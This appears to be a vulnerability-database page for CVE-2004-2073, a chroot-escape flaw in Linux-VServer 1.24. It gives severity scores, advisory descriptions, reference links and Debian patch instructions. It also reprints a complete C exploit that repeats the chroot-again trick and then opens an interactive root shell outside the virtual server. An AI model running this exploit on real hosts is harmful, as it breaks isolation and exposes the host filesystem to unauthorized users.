CVE-2004-2073
CVSS 7.2
Published: 2004-02-06 00:00:00
Modified: 2008-09-05 16:43:07

[Original] Linux-VServer 1.24 allows local users with root privileges on a virtual server to gain access to the filesystem outside the virtual server via a modified chroot-again exploit using the chmod command.


[CNNVD] Linux VServer Project chroot environment breakout vulnerability (CNNVD-200402-030)

        
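        Linux-VServer is software that lets users set up virtual private servers on an ordinary Linux server.
        Linux-VServer has a classic "chroot-again" problem; a local attacker can exploit this vulnerability to execute arbitrary commands on the system with root privileges.
        The main problem is that the VServer application is not well protected against "chroot-again" style attacks; an attacker can exploit this vulnerability to escape the restricted environment and access arbitrary files outside the restricted directory.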
        

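- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete shutdown of the system]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]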

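- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found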

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2073
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2073
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-030
(Official data source) CNNVD

- Other links and resources

http://www.linux-vserver.org/index.php?page=ChangeLog
(VENDOR_ADVISORY)  CONFIRM  http://www.linux-vserver.org/index.php?page=ChangeLog
http://xforce.iss.net/xforce/xfdb/15073
(VENDOR_ADVISORY)  XF  linux-vserver-gain-privileges(15073)
http://www.securityfocus.com/bid/9596
(VENDOR_ADVISORY)  BID  9596
http://www.securityfocus.com/archive/1/353003
(VENDOR_ADVISORY)  BUGTRAQ  20040206 Linux 2.4.24 with vserver 1.24 exploit
http://www.osvdb.org/3875
(UNKNOWN)  OSVDB  3875
http://secunia.com/advisories/10816
(UNKNOWN)  SECUNIA  10816

- Vulnerability information

Linux VServer Project chroot environment breakout vulnerability
High risk  Other
2004-02-06 00:00:00 2005-10-20 00:00:00
Local
        
        

- Announcements and patches

        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-1011-1) and corresponding patches for this issue:
        DSA-1011-1: New kernel-patch-vserver packages fix root exploit
        Link:
        http://www.debian.org/security/2005/dsa-1011

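        Patch installation:
        1. Install the patch package manually:
         First, download the patch package with the following command:
         # wget url (url is the patch download link)
         Then install the patch with the following command:
         # dpkg -i file.deb (file is the name of the corresponding patch package)
        2. Install the patch package automatically with apt-get:
         First, update the internal database with the following command:
         # apt-get update
        
         Then install the updated packages with the following command:
         # apt-get upgrade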
        VServer
        -------
        
        http://www.debian.org/security/2006/dsa-1011

- Vulnerability information (23658)

Linux VServer Project 1.2x CHRoot Breakout Vulnerability (EDBID:23658)
linux local
2004-02-06 Verified
0 Markus Mueller
N/A
source: http://www.securityfocus.com/bid/9596/info

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.

/* vserver@deadbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

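#include <stdio.h>      /* perror, printf */
#include <stdlib.h>     /* exit */
#include <unistd.h>     /* chdir, chroot, execl */
#include <sys/types.h>
#include <sys/stat.h>   /* mkdir, chmod, S_IXOTH */

int main(void)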
{
int i;

if (chdir("/") != 0) {
  perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
  perror("mkdir baz");
}
if (chroot("baz") != 0) {
  perror("chroot baz"); exit(1);
}

for (i=0; i<50; i++) {
   if (chdir("..") != 0) {
      perror("cd .."); /* exit(1); */
   }
   if (chmod("..", S_IXOTH) != 0) {
      perror("chmod"); /* exit(1); */
   }
}
if (chroot(".") != 0) {
  perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}
		

- Vulnerability information

3875
Linux VServer Chroot Escape
Local Access Required Authentication Management, Other
Exploit Public

- Vulnerability description

Linux-Vserver contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when an attacker breaks the chroot jail and is able to traverse other directories. This flaw may lead to a loss of confidentiality.

- Timeline

2004-02-06 2004-02-06
Unknown Unknown

- Solution

Upgrade to version 1.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
